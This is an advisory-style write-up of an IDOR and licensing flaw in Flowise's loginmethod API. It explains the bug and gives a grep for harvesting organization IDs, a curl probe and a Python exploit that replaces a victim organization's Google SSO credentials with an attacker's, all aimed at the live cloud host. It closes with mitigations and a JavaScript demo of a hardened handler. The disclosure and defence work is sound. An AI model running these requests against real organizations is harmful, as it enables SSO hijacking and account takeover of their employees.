The vulnerability is an Insecure Direct Object Reference (IDOR) combined with a business logic flaw in the `PUT /api/v1/loginmethod` endpoint of Flowise. The endpoint requires authentication, but it never checks that the authenticated user belongs to, or administers, the organization named by the `organizationId` field of the request body. The backend takes `organizationId` from the JSON body and updates the matching database record directly; there is no middleware or handler logic enforcing `request.user.organizationId === body.organizationId`.

Any low-privileged user, including one on the "Free" plan, can therefore overwrite the SSO configuration of any other organization. All the attacker needs is a valid account of their own and the victim's organization ID (the request shape also carries a `userId` from the target organization). The attacker replaces the victim organization's legitimate OAuth credentials (for example its Google Client ID and secret) with credentials for an OAuth application they control. When the victim's employees next sign in via SSO, they are authenticated against the attacker's application, which leads to full account takeover. As a side effect, the same flaw lets free-tier users enable "Enterprise-only" SSO features without a valid license, because no tier check is applied on this path either.
DailyCVE Form:
Platform: Flowise Cloud
Version: Unspecified
Vulnerability: IDOR + Business Logic Flaw
Severity: Critical
Date: Not specified
Prediction: Patch unknown
What Undercode Says:
Analytics:
Identify organization IDs via user enumeration or API response leakage
grep -oP '"organizationId":"[a-f0-9-]+"' response.json | sort -u
Check whether your low-privilege JWT is accepted for another organization (a vulnerable instance answers 200, a patched one should answer 403). Note that the body below replaces the target's provider list with an empty one, which would disable that organization's SSO, so run it only against an organization you own or are authorized to test:
curl -X PUT https://cloud.flowiseai.com/api/v1/loginmethod -H "Cookie: token=<YOUR_JWT>" -H "Content-Type: application/json" -d '{"organizationId":"victim-org-id","userId":"victim-user-id","providers":[]}' -v
Exploit:
import requests

target = "https://cloud.flowiseai.com"
attacker_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."  # low-privilege (e.g. Free plan) session token
victim_org_id = "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d"
victim_user_id = "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"

# Malicious OAuth app controlled by the attacker; it replaces the victim org's Google SSO credentials
payload = {
    "organizationId": victim_org_id,  # never compared against the caller's own organization
    "userId": victim_user_id,
    "providers": [
        {
            "providerLabel": "Google",
            "providerName": "google",
            "config": {
                "clientID": "ATTACKER_MALICIOUS_CLIENT_ID",
                "clientSecret": "ATTACKER_MALICIOUS_SECRET"
            },
            "status": "enable"
        }
    ]
}
headers = {
    "Cookie": f"token={attacker_jwt}",
    "Content-Type": "application/json"
}

response = requests.put(f"{target}/api/v1/loginmethod", json=payload, headers=headers, timeout=30)
print(f"Status: {response.status_code}")  # 200 on a vulnerable instance
print(f"Response: {response.text}")
Protection from this CVE:
- Implement ownership validation: take the organization from the authenticated session (`request.user.organizationId`) and reject any request whose body `organizationId` differs from it, before any update is performed; never use the body value as the key for the write.
- Enforce role-based access control (RBAC) to ensure only admins can modify organization settings.
- Add server-side checks for license tier before enabling paid features.
- Log all configuration changes for audit trails.
- Upgrade to latest patched version when available.
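The missing ownership check described in the vulnerability summary above, and the ownership, role and license checks recommended in this list, shown as an added example in JavaScript (Flowise's server is an Express/TypeScript code base, but this is not Flowise's code). It models the `PUT /api/v1/loginmethod` handler against an in-memory store, in its vulnerable form beside a hardened form, and replays the attacker's request from the exploit above through both. The store layout, function names, role names ("member", "admin") and plan names ("free", "enterprise") are assumptions made for the example; the request shape (`organizationId`, `userId`, `providers`) is the one from the exploit.

```javascript
// Added example, not Flowise code. Store layout, role and plan names are assumptions.

// organizationId -> login method record (constructed sample data)
const loginMethods = new Map();
// organizationId -> organization record (plan name is an assumption)
const organizations = new Map([
  ["org-victim", { plan: "enterprise" }],
  ["org-attacker", { plan: "free" }],
]);
const auditLog = [];

function seed() {
  loginMethods.clear();
  auditLog.length = 0;
  loginMethods.set("org-victim", {
    providers: [{ providerName: "google", config: { clientID: "LEGIT_CLIENT_ID" }, status: "enable" }],
  });
  loginMethods.set("org-attacker", { providers: [] });
}

// Vulnerable form: checks only that someone is logged in, then writes to
// whatever organizationId the JSON body names.
function vulnerableUpdateLoginMethod(user, body) {
  if (!user) return { status: 401 };
  loginMethods.set(body.organizationId, { providers: body.providers });
  return { status: 200 };
}

// Hardened form: the organization comes from the session, never from the body.
// A mismatching body.organizationId is rejected and logged rather than silently
// corrected, so probing shows up in the audit trail. Admin role and plan tier
// are checked server-side before the write.
function hardenedUpdateLoginMethod(user, body) {
  if (!user) return { status: 401, error: "authentication required" };
  const orgId = user.organizationId;
  if (body.organizationId !== undefined && body.organizationId !== orgId) {
    auditLog.push({ event: "loginmethod.denied", userId: user.id, requested: body.organizationId, actual: orgId });
    return { status: 403, error: "organizationId does not belong to the caller" };
  }
  if (user.role !== "admin") return { status: 403, error: "admin role required to change login methods" };
  if (!Array.isArray(body.providers)) return { status: 400, error: "providers must be an array" };
  const enablesSso = body.providers.some((p) => p.status === "enable");
  const org = organizations.get(orgId);
  if (enablesSso && (!org || org.plan !== "enterprise")) {
    return { status: 403, error: "SSO providers require an enterprise plan" };
  }
  loginMethods.set(orgId, { providers: body.providers });
  auditLog.push({ event: "loginmethod.updated", userId: user.id, organizationId: orgId });
  return { status: 200 };
}

// Which Google client ID the victim organization's SSO currently points at.
function victimGoogleClientId() {
  const google = loginMethods.get("org-victim").providers.find((p) => p.providerName === "google");
  return google ? google.config.clientID : null;
}

// Replay the attacker's request through both handlers, then two legitimate cases.
function demo() {
  const attacker = { id: "u-attacker", organizationId: "org-attacker", role: "member" };
  const victimAdmin = { id: "u-victim-admin", organizationId: "org-victim", role: "admin" };
  const attackerAdmin = { id: "u-attacker-admin", organizationId: "org-attacker", role: "admin" };
  const maliciousBody = {
    organizationId: "org-victim",
    userId: "u-victim-admin",
    providers: [{ providerLabel: "Google", providerName: "google",
                  config: { clientID: "ATTACKER_MALICIOUS_CLIENT_ID", clientSecret: "ATTACKER_MALICIOUS_SECRET" },
                  status: "enable" }],
  };
  const results = {};

  seed();
  results.vulnerable = vulnerableUpdateLoginMethod(attacker, maliciousBody).status;
  results.vulnerableClientId = victimGoogleClientId();   // victim now logs in via the attacker's app

  seed();
  results.hardened = hardenedUpdateLoginMethod(attacker, maliciousBody).status;
  results.hardenedClientId = victimGoogleClientId();     // unchanged

  // Admin of the victim organization rotating its own credentials still works.
  results.legitimate = hardenedUpdateLoginMethod(victimAdmin, {
    organizationId: "org-victim",
    providers: [{ providerName: "google", config: { clientID: "ROTATED_ID" }, status: "enable" }],
  }).status;
  results.legitimateClientId = victimGoogleClientId();

  // Free-plan admin trying to enable SSO for their own organization is refused.
  results.freeTierSso = hardenedUpdateLoginMethod(attackerAdmin,
    { organizationId: "org-attacker", providers: maliciousBody.providers }).status;

  results.deniedEvents = auditLog.filter((e) => e.event === "loginmethod.denied").length;
  return results;
}

console.log(demo());
```

The hardened handler rejects a foreign `organizationId` instead of quietly overwriting it with the session's value: silently correcting the field would hide exactly the probing the audit-log recommendation is meant to surface.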
Impact:
- Account Takeover: Attacker can hijack all employee logins via rogue SSO.
- Data Breach: Unauthorized access to victim organization’s internal systems.
- Privilege Escalation: Free users bypass license restrictions.
- Business Disruption: Legitimate SSO becomes unusable, blocking employee access.
Sources:
Reported By: github.com

